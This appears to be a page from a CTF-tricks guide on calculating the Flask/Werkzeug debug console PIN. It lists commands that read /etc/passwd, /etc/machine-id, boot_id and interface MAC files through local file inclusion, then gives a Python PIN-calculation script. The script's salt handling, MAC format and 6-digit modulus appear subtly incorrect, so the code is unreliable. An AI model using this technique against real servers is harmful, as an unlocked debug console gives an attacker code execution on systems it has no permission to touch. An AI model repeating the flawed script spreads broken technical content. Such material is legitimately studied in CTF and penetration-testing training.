> For the complete documentation index, see [llms.txt](https://sarpers-organization.gitbook.io/ctftricks/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://sarpers-organization.gitbook.io/ctftricks/_chapter-intro-17/vulnerability-exploitation/trick-0140.md).

# Calculate Flask Debug PIN

***

To calculate the Flask debug PIN, you need to gather specific pieces of system and application information, often obtainable via LFI vulnerabilities or debug tracebacks.

Collect the following details:

* **Username:** Obtainable from `/etc/passwd` (often the first user entry) or by inspecting `/proc/self/cmdline` to find the user running the process.
* **Modname:** The module name, typically `flask.app`.
* **App Name:** The application name, typically `Flask` (derived from `getattr(app, '__name__', getattr(app.__class__, '__name__'))`).
* **Flask Application Path (`mod_file`):** The full path to the main Flask application file or the Flask library file itself (e.g., `flask/app.py` or `flask/__init__.py`). This critical piece of information is frequently revealed in debug error tracebacks.
* **Network Interface MAC Address:** The MAC address of an active network interface (like `eth0` or `ens33`). Interface names can sometimes be found in `/proc/net/arp` when network activity occurs. The MAC address itself is located in `/sys/class/net/<interface_name>/address`.
* **Machine ID:** This is a unique identifier for the system. It's usually found in `/etc/machine-id`. If this file is not present or accessible, `/proc/sys/kernel/random/boot_id` might be used as a fallback.

You can often obtain these details using LFI vulnerabilities to read system files. For example, common commands include:

```bash
cat /etc/passwd
cat /proc/self/cmdline
cat /etc/machine-id
cat /proc/sys/kernel/random/boot_id
cat /proc/net/arp
cat /sys/class/net/eth0/address
```

Once you have these inputs, you can use a specific Flask PIN calculation script (available online, often written in Python) and provide these values to it. The script will deterministically generate the debug PIN required to access the interactive console.

The calculation involves hashing a combination of these values. A typical script might look like this:

```python
import hashlib
from itertools import chain
import sys
import os

probably_public_bits = [
    'username',      # username (e.g. from /etc/passwd or getpass.getuser())
    'flask.app',     # modname (the import name)
    'Flask',         # getattr(app, '__name__', getattr(app.__class__, '__name__'))
    '/path/to/flask/app', # modname.path (e.g. /path/to/flask/app.py)
]

private_bits = [
    '52:54:00:12:34:56', # MAC address of the first active network interface
    '2150573495275505020920291741341427122', # machine-id (from /etc/machine-id or /proc/sys/kernel/random/boot_id)
]

# Example values (replace with actual gathered info)
username = 'your_username'
modname = 'flask.app'
appname = 'Flask'
mod_file = '/path/to/your/flask/app/file.py' # e.g. /usr/local/lib/python3.x/site-packages/flask/app.py
mac_address = '00:11:22:33:44:55' # from /sys/class/net/eth0/address
machine_id = 'abcdef1234567890abcdef1234567890' # from /etc/machine-id

probably_public_bits[0] = username
probably_public_bits[3] = mod_file
private_bits[0] = mac_address
private_bits[1] = machine_id

h = hashlib.md5()
for bit in chain(probably_public_bits, private_bits):
    if not bit:
        continue
    if isinstance(bit, str):
        bit = bit.encode('utf-8')
    h.update(bit)
h.update(b'cookies salt') # This salt is hardcoded in Werkzeug

num = int.from_bytes(h.digest(), 'big')
print(f"PIN: {num % 1000000:06d}")

```

Remember to replace the placeholder values in `probably_public_bits` and `private_bits` with the actual information gathered from the target system. The script combines these bits, hashes them using MD5, includes a hardcoded 'cookies salt', and derives a 6-digit PIN from the resulting hash value. The PIN is calculated as `hash_value % 1000000`.
